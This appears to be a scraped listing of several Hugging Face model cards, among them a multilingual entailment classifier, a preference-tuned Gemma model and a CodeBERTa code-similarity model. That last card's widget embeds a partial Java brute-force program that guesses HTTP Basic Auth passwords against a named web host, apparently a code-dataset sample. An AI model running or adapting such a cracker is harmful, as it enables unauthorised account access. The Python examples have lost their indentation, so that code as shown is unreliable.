### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
derekcurtis1/SD35_minecraft_cobble
|
derekcurtis1
| 2025-09-23T16:56:03Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T16:42:19Z |
---
license: apache-2.0
---
|
oist/multimodal_nli_model
|
oist
| 2025-09-23T16:53:39Z | 0 | 0 | null |
[
"safetensors",
"mmnli",
"sentence-similarity",
"custom_code",
"ace",
"acm",
"acq",
"aeb",
"af",
"ajp",
"ak",
"am",
"apc",
"ar",
"ars",
"ary",
"arz",
"as",
"ast",
"awa",
"ay",
"azb",
"azj",
"ba",
"bm",
"ban",
"be",
"bem",
"bn",
"bho",
"bjn",
"bo",
"bs",
"bug",
"bg",
"ca",
"ceb",
"cs",
"cjk",
"ckb",
"crh",
"cy",
"da",
"de",
"dik",
"dyu",
"dz",
"el",
"en",
"eo",
"et",
"eu",
"ee",
"fo",
"fa",
"fj",
"fi",
"fon",
"fr",
"fur",
"ff",
"gd",
"ga",
"gl",
"gn",
"gu",
"ht",
"ha",
"he",
"hi",
"hne",
"hr",
"hu",
"hy",
"ig",
"ilo",
"id",
"is",
"it",
"jv",
"ja",
"kab",
"kac",
"kam",
"kn",
"ks",
"ka",
"kr",
"kk",
"kbp",
"kea",
"km",
"ki",
"rw",
"ky",
"kmb",
"kg",
"ko",
"kmr",
"lo",
"lv",
"lij",
"li",
"ln",
"lt",
"lmo",
"ltg",
"lb",
"lua",
"lg",
"luo",
"lus",
"mag",
"mai",
"ml",
"mr",
"min",
"mk",
"plt",
"mt",
"mni",
"mn",
"mos",
"mi",
"ms",
"my",
"nl",
"nn",
"nb",
"ne",
"nso",
"nus",
"ny",
"oc",
"gaz",
"ory",
"pag",
"pa",
"pap",
"pl",
"pt",
"prs",
"pbt",
"qu",
"ro",
"rn",
"ru",
"sg",
"sa",
"sat",
"scn",
"shn",
"si",
"sk",
"sl",
"sm",
"sn",
"sd",
"so",
"st",
"es",
"als",
"sc",
"sr",
"ss",
"su",
"sv",
"sw",
"szl",
"ta",
"tt",
"te",
"tg",
"tl",
"th",
"ti",
"taq",
"tpi",
"tn",
"ts",
"tk",
"tum",
"tr",
"tw",
"tzm",
"ug",
"uk",
"umb",
"ur",
"uz",
"vec",
"vi",
"war",
"wo",
"xh",
"yi",
"yo",
"yue",
"zh",
"zu",
"license:cc-by-nc-4.0",
"region:us"
] |
sentence-similarity
| 2025-09-23T15:17:30Z |
---
license: cc-by-nc-4.0
language:
- ace
- acm
- acq
- aeb
- af
- ajp
- ak
- am
- apc
- ar
- ars
- ary
- arz
- as
- ast
- awa
- ay
- azb
- azj
- ba
- bm
- ban
- be
- bem
- bn
- bho
- bjn
- bo
- bs
- bug
- bg
- ca
- ceb
- cs
- cjk
- ckb
- crh
- cy
- da
- de
- dik
- dyu
- dz
- el
- en
- eo
- et
- eu
- ee
- fo
- fa
- fj
- fi
- fon
- fr
- fur
- ff
- gd
- ga
- gl
- gn
- gu
- ht
- ha
- he
- hi
- hne
- hr
- hu
- hy
- ig
- ilo
- id
- is
- it
- jv
- ja
- kab
- kac
- kam
- kn
- ks
- ka
- kr
- kk
- kbp
- kea
- km
- ki
- rw
- ky
- kmb
- kg
- ko
- kmr
- lo
- lv
- lij
- li
- ln
- lt
- lmo
- ltg
- lb
- lua
- lg
- luo
- lus
- mag
- mai
- ml
- mr
- min
- mk
- plt
- mt
- mni
- mn
- mos
- mi
- ms
- my
- nl
- nn
- nb
- ne
- nso
- nus
- ny
- oc
- gaz
- ory
- pag
- pa
- pap
- pl
- pt
- prs
- pbt
- qu
- ro
- rn
- ru
- sg
- sa
- sat
- scn
- shn
- si
- sk
- sl
- sm
- sn
- sd
- so
- st
- es
- als
- sc
- sr
- ss
- su
- sv
- sw
- szl
- ta
- tt
- te
- tg
- tl
- th
- ti
- taq
- tpi
- tn
- ts
- tk
- tum
- tr
- tw
- tzm
- ug
- uk
- umb
- ur
- uz
- vec
- vi
- war
- wo
- xh
- yi
- yo
- yue
- zh
- zu
language_details: >-
ace_Arab, ace_Latn, acm_Arab, acq_Arab, aeb_Arab, afr_Latn, ajp_Arab,
aka_Latn, amh_Ethi, apc_Arab, arb_Arab, ars_Arab, ary_Arab, arz_Arab,
asm_Beng, ast_Latn, awa_Deva, ayr_Latn, azb_Arab, azj_Latn, bak_Cyrl,
bam_Latn, ban_Latn, bel_Cyrl, bem_Latn, ben_Beng, bho_Deva, bjn_Arab,
bod_Tibt, bos_Latn, bug_Latn, bul_Cyrl, cat_Latn, ceb_Latn, ces_Latn,
cjk_Latn, ckb_Arab, crh_Latn, cym_Latn, dan_Latn, deu_Latn, dik_Latn,
dyu_Latn, dzo_Tibt, ell_Grek, eng_Latn, epo_Latn, est_Latn, eus_Latn,
ewe_Latn, fao_Latn, pes_Arab, fij_Latn, fin_Latn, fon_Latn, fra_Latn,
fur_Latn, fuv_Latn, gla_Latn, gle_Latn, glg_Latn, grn_Latn, guj_Gujr,
hat_Latn, hau_Latn, heb_Hebr, hin_Deva, hne_Deva, hrv_Latn, hun_Latn,
hye_Armn, ibo_Latn, ilo_Latn, ind_Latn, isl_Latn, ita_Latn, jav_Latn,
jpn_Jpan, kab_Latn, kac_Latn, kam_Latn, kan_Knda, kas_Arab, kas_Deva,
kat_Geor, knc_Arab, knc_Latn, kaz_Cyrl, kbp_Latn, kea_Latn, khm_Khmr,
kik_Latn, kin_Latn, kir_Cyrl, kmb_Latn, kon_Latn, kor_Hang, kmr_Latn,
lao_Laoo, lvs_Latn, lij_Latn, lim_Latn, lin_Latn, lit_Latn, lmo_Latn,
ltg_Latn, ltz_Latn, lua_Latn, lug_Latn, luo_Latn, lus_Latn, mag_Deva,
mai_Deva, mal_Mlym, mar_Deva, min_Latn, mkd_Cyrl, plt_Latn, mlt_Latn,
mni_Beng, khk_Cyrl, mos_Latn, mri_Latn, zsm_Latn, mya_Mymr, nld_Latn,
nno_Latn, nob_Latn, npi_Deva, nso_Latn, nus_Latn, nya_Latn, oci_Latn,
gaz_Latn, ory_Orya, pag_Latn, pan_Guru, pap_Latn, pol_Latn, por_Latn,
prs_Arab, pbt_Arab, quy_Latn, ron_Latn, run_Latn, rus_Cyrl, sag_Latn,
san_Deva, sat_Beng, scn_Latn, shn_Mymr, sin_Sinh, slk_Latn, slv_Latn,
smo_Latn, sna_Latn, snd_Arab, som_Latn, sot_Latn, spa_Latn, als_Latn,
srd_Latn, srp_Cyrl, ssw_Latn, sun_Latn, swe_Latn, swh_Latn, szl_Latn,
tam_Taml, tat_Cyrl, tel_Telu, tgk_Cyrl, tgl_Latn, tha_Thai, tir_Ethi,
taq_Latn, taq_Tfng, tpi_Latn, tsn_Latn, tso_Latn, tuk_Latn, tum_Latn,
tur_Latn, twi_Latn, tzm_Tfng, uig_Arab, ukr_Cyrl, umb_Latn, urd_Arab,
uzn_Latn, vec_Latn, vie_Latn, war_Latn, wol_Latn, xho_Latn, ydd_Hebr,
yor_Latn, yue_Hant, zho_Hans, zho_Hant, zul_Latn
pipeline_tag: sentence-similarity
---
# Multilingual & Multimodal NLI (MMNLI)
The full details of the MMNLI model, including architecture, training, and evaluation, are described in the paper [Beyond Similarity Scoring: Detecting Entailment and Contradiction in Multilingual and Multimodal Contexts](https://www.isca-speech.org/archive/Interspeech_2025/paper286.pdf) by Istaiteh, O., Mdhaffar, S., & Estève, Y. (Interspeech 2025). Please cite this paper if you use the MMNLI model in your research.
This repository provides the **MMNLI model**, a multilingual and multimodal Natural Language Inference classifier.
It extends the BLASER architecture into **multiclass NLI**, supporting entailment, contradiction, and neutrality across text-text, text-speech, speech-text, and speech-speech input pairs.
The model is trained on the [oist/multimodal_nli_dataset](https://huggingface.co/datasets/oist/multimodal_nli_dataset).
Please refer to that dataset card for details.
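As a rough illustration of the BLASER-style design the card refers to (not the exact MMNLI architecture, which is described in the paper), such classifiers typically combine the premise and hypothesis embeddings into a single feature vector before a small MLP head. A minimal sketch of one common feature combination, in plain Python with toy vectors:

```python
def combine_features(p, h):
    """Combine premise and hypothesis embeddings into one feature
    vector, BLASER-style: [p, h, |p - h|, p * h].
    Hypothetical helper for illustration only; the actual MMNLI
    feature set is defined in the paper and model code."""
    diff = [abs(a - b) for a, b in zip(p, h)]
    prod = [a * b for a, b in zip(p, h)]
    return list(p) + list(h) + diff + prod

# Toy 3-dimensional "embeddings" (real SONAR embeddings are 1024-d)
premise = [0.5, -1.0, 2.0]
hypothesis = [0.5, 1.0, 0.0]
features = combine_features(premise, hypothesis)
print(len(features))  # 4 * embedding dimension
```

The concatenated features are then fed to a classifier head that outputs the three NLI logits.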
### Results
On the test set of the dataset, the MMNLI model achieves an **F1-micro score of 0.749**.
---
## Usage
The model depends on **SONAR embeddings**. You can use the official SONAR encoders (for text and speech) [from GitHub](https://github.com/facebookresearch/SONAR/tree/main) or the **ported SONAR text encoder** [`cointegrated/SONAR_200_text_encoder`](https://huggingface.co/cointegrated/SONAR_200_text_encoder).
---
### Example 1: Speech–Text Inference
```python
import torch
from sonar.inference_pipelines.speech import SpeechToEmbeddingModelPipeline
from sonar.inference_pipelines.text import TextToEmbeddingModelPipeline
from transformers import AutoModel
# 1. Load SONAR encoders
speech_encoder = SpeechToEmbeddingModelPipeline(encoder="sonar_speech_encoder_eng")
text_encoder = TextToEmbeddingModelPipeline(encoder="text_sonar_basic_encoder", tokenizer="text_sonar_basic_encoder")
# 2. Encode premise (speech) and hypothesis (text)
premise_embs = speech_encoder.predict(["audio.wav"])
hypothesis_embs = text_encoder.predict(["The cat sat on the mat."], source_lang="eng_Latn")
# 3. Load MMNLI model
mmnli_model_name = "oist/multimodal_nli_model"
mmnli_model = AutoModel.from_pretrained(mmnli_model_name, trust_remote_code=True)
mmnli_model.eval()
# 4. Run inference
with torch.inference_mode():
logits = mmnli_model(premise_embs, hypothesis_embs) # returns [batch_size, 3]
pred_class = torch.argmax(logits, dim=-1).item()
print("Prediction:", pred_class)
# 0 = Entailment, 1 = Neutral, 2 = Contradiction
```
### Example 2: Text–Text Inference (Official SONAR)
```python
import torch
from sonar.inference_pipelines.text import TextToEmbeddingModelPipeline
from transformers import AutoModel
# 1. Load official SONAR text encoder
text_encoder = TextToEmbeddingModelPipeline(
encoder="text_sonar_basic_encoder",
tokenizer="text_sonar_basic_encoder"
)
# 2. Encode premise and hypothesis
premise_texts = ["Le chat s'assit sur le tapis."]
hypothesis_texts = ["The cat sat on the mat."]
premise_embs = text_encoder.predict(premise_texts, source_lang="fra_Latn")
hypothesis_embs = text_encoder.predict(hypothesis_texts, source_lang="eng_Latn")
# 3. Load MMNLI model
mmnli_model = AutoModel.from_pretrained("oist/multimodal_nli_model", trust_remote_code=True)
mmnli_model.eval()
# 4. Run inference
with torch.inference_mode():
logits = mmnli_model(premise_embs, hypothesis_embs)
pred_class = torch.argmax(logits, dim=-1).item()
print("Prediction:", pred_class)
# 0 = Entailment, 1 = Neutral, 2 = Contradiction
```
### Example 3: Text–Text Inference (Ported SONAR)
```python
import torch
from transformers import AutoTokenizer, AutoModel
from transformers.models.m2m_100.modeling_m2m_100 import M2M100Encoder
# 1. Load ported SONAR text encoder
sonar_model_name = "cointegrated/SONAR_200_text_encoder"
encoder = M2M100Encoder.from_pretrained(sonar_model_name)
tokenizer = AutoTokenizer.from_pretrained(sonar_model_name)
def encode_mean_pool(texts, tokenizer, encoder, lang='eng_Latn', norm=False):
tokenizer.src_lang = lang
with torch.inference_mode():
batch = tokenizer(texts, return_tensors='pt', padding=True)
seq_embs = encoder(**batch).last_hidden_state
mask = batch.attention_mask
mean_emb = (seq_embs * mask.unsqueeze(-1)).sum(1) / mask.unsqueeze(-1).sum(1)
if norm:
mean_emb = torch.nn.functional.normalize(mean_emb)
return mean_emb
# Example sentences
premise_sentences = ["Le chat s'assit sur le tapis."]
hypothesis_sentences = ["The cat sat on the mat."]
# 2. Encode premise and hypothesis
premise_embs = encode_mean_pool(premise_sentences, tokenizer, encoder, lang="fra_Latn")
hypothesis_embs = encode_mean_pool(hypothesis_sentences, tokenizer, encoder, lang="eng_Latn")
# 3. Load MMNLI model
mmnli_model_name = "oist/multimodal_nli_model"
mmnli_model = AutoModel.from_pretrained(mmnli_model_name, trust_remote_code=True)
mmnli_model.eval()
# 4. Run inference
with torch.inference_mode():
logits = mmnli_model(premise_embs, hypothesis_embs) # returns [batch_size, 3]
pred_class = torch.argmax(logits, dim=-1).item()
print("Prediction:", pred_class)
# 0 = Entailment, 1 = Neutral, 2 = Contradiction
```
### Example 4: Using BLASER Semantic Score with MMNLI
You can combine the BLASER semantic score with the MMNLI prediction to get a **better understanding of the relationship** between source and candidate translations: the MMNLI class gives the entailment/contradiction/neutral label, while the BLASER score provides a fine-grained semantic similarity.
```python
import torch
from transformers import AutoTokenizer, AutoModel
from transformers.models.m2m_100.modeling_m2m_100 import M2M100Encoder
# -------------------------
# 1️⃣ Load ported SONAR text encoder
# -------------------------
sonar_model_name = "cointegrated/SONAR_200_text_encoder"
encoder = M2M100Encoder.from_pretrained(sonar_model_name)
tokenizer = AutoTokenizer.from_pretrained(sonar_model_name)
def encode_mean_pool(texts, tokenizer, encoder, lang='eng_Latn', norm=False):
tokenizer.src_lang = lang
with torch.inference_mode():
batch = tokenizer(texts, return_tensors='pt', padding=True)
seq_embs = encoder(**batch).last_hidden_state
mask = batch.attention_mask
mean_emb = (seq_embs * mask.unsqueeze(-1)).sum(1) / mask.unsqueeze(-1).sum(1)
if norm:
mean_emb = torch.nn.functional.normalize(mean_emb)
return mean_emb
# -------------------------
# 2️⃣ Example sentences
# -------------------------
src_sentence = ["He is happy."]
mt_sentences = [
    "Il est content.",      # entailment, BLASER: 4.515
    "Il est malheureux."    # contradiction, BLASER: 4.41
]
# Encode source and MT sentences
src_embs = encode_mean_pool(src_sentence, tokenizer, encoder, lang="eng_Latn")
mt_embs = encode_mean_pool(mt_sentences, tokenizer, encoder, lang="fra_Latn")
# -------------------------
# 3️⃣ Load MMNLI model
# -------------------------
mmnli_model_name = "oist/multimodal_nli_model"
mmnli_model = AutoModel.from_pretrained(mmnli_model_name, trust_remote_code=True)
mmnli_model.eval()
# -------------------------
# 4️⃣ Load BLASER QE model
# -------------------------
qe_model_name = "oist/blaser_2_0_qe_ported"
qe_model = AutoModel.from_pretrained(qe_model_name, trust_remote_code=True)
qe_model.eval()
# -------------------------
# 5️⃣ Run inference
# -------------------------
for i, mt_sentence in enumerate(mt_sentences):
mt_emb = mt_embs[i].unsqueeze(0) # keep batch dimension
# NLI prediction
with torch.inference_mode():
logits = mmnli_model(src_embs, mt_emb)
pred_class = torch.argmax(logits, dim=-1).item()
# BLASER semantic score
with torch.inference_mode():
qe_score = qe_model(src_embs, mt_emb) # shape [1, 1]
print(f"\nMT sentence: '{mt_sentence}'")
print("NLI prediction:", ["Entailment", "Neutral", "Contradiction"][pred_class])
print("BLASER semantic score:", qe_score.item())
```
---
## Labels
- 0 = Entailment
- 1 = Neutral
- 2 = Contradiction
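For convenience, the argmax of the 3-way logits can be mapped to these label names with a small helper (a sketch; the label order follows the list above):

```python
LABELS = ["Entailment", "Neutral", "Contradiction"]

def label_of(logits):
    """Return the label name for one example's 3-way logits.
    Accepts any sequence of three floats, e.g. logits[0].tolist()
    taken from the MMNLI model output."""
    best = max(range(len(logits)), key=lambda i: logits[i])
    return LABELS[best]

print(label_of([2.3, 0.1, -1.4]))  # Entailment
```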
---
## Citation
If you use this model, please cite:
```bibtex
@inproceedings{istaiteh2025beyond,
title={Beyond Similarity Scoring: Detecting Entailment and Contradiction in Multilingual and Multimodal Contexts},
author={Istaiteh, Othman and Mdhaffar, Salima and Est{\`e}ve, Yannick},
booktitle={Proc. Interspeech 2025},
pages={286--290},
year={2025}
}
```
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64-0922195506-epoch-9
|
vectorzhou
| 2025-09-23T16:52:32Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:41:34Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64-0922195506-epoch-9", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/2zoaj66c)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
saptoji/blockassist
|
saptoji
| 2025-09-23T16:52:13Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"aquatic twitchy mallard",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-17T08:11:26Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- aquatic twitchy mallard
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
mb7419/bert-base-uncased-tesla-ic-tuned
|
mb7419
| 2025-09-23T16:51:35Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"bert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T08:27:06Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
buelfhood/SOCO-Java-codeberta-cmnrl-triplets-ep1-bs256-lr5e-05-split0.2
|
buelfhood
| 2025-09-23T16:47:52Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"roberta",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:34368",
"loss:CachedMultipleNegativesRankingLoss",
"dataset:buelfhood/SOCO_TRAIN_java",
"arxiv:1908.10084",
"arxiv:2101.06983",
"base_model:huggingface/CodeBERTa-small-v1",
"base_model:finetune:huggingface/CodeBERTa-small-v1",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T16:47:41Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:34368
- loss:CachedMultipleNegativesRankingLoss
base_model: huggingface/CodeBERTa-small-v1
widget:
- source_sentence: "import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport\
\ java.util.*;\n\nclass BruteForce {\n\n String password=\"\";\n\n int num\
\ =401;\n\n\n public static void main (String[] args) {\n\n String str=\"\
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n\n BruteForce URLcon;\n\
\n int length = 0;\n\n String passwd=\"\";\n\n int t0,t1;\n\n\
\ \n if (args.length == 0) {\n \t\n \tSystem.err.println (\n\
\ \t\t\n \t\t\"Usage : java BruteForce <username>\");\n \treturn;\n\
\ \t\n \t}\n String username = args[0];\n \n\n t0=System.currentTimeMillis();\n\
\n System.out.println (\" \" + new Date());\n \n System.out.println\
\ (\"Using BruteForce method attack \"+username+\"'s password.Please waiting.......\"\
);\n\n for (int i=0;i<str.length();i++){\n\n passwd=str.substring(i,i+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401)\
\ {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println(\"\
The password: \"+ passwd);\n\n \tdouble dt =t1-t0;\n\n\n\n \
\ \tSystem.out.println(\"It took \"+ DecimalFormat.getInstance().format(dt/1000)+\
\ \" seconds.\");\n\n System.out.println (\"Finish \" + new Date());\n\
\ \n \treturn;\n\n }\n\n for\
\ (int j=0;j<str.length();j++){\n\n passwd =str.substring(i,i+1)+str.substring(j,j+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \t t1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ double dt =t1-t0;\n\n\n\n System.out.println(\"\
It took \"+ DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ System.out.println (\"Finish \" + new Date());\n \
\ \t return;\n\n }\n for (int m=0;m<str.length();m++){\n\
\n passwd = str.substring(i,i+1)+str.substring(j,j+1)+str.substring(m,m+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ \t double dt =t1-t0;\n\n\n\n \tSystem.out.println(\"\
It took \"+DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ \n System.out.println (\"Finish \" + new\
\ Date());\n \n \t return;\n\n \
\ }\n\n\n }\n\n}\n}\n System.out.println(\" not find the\
\ password\");\n\n}\n\n public BruteForce (String password, String username){\n\
\n \t String urlString = \"http://sec-crack.cs.rmit.edu./SEC/2/\" ;\n\n \
\ \n\n try {\n\n String userPassword = username+\":\"+password ;\n\
\n String encoding = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\
\n URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection)\
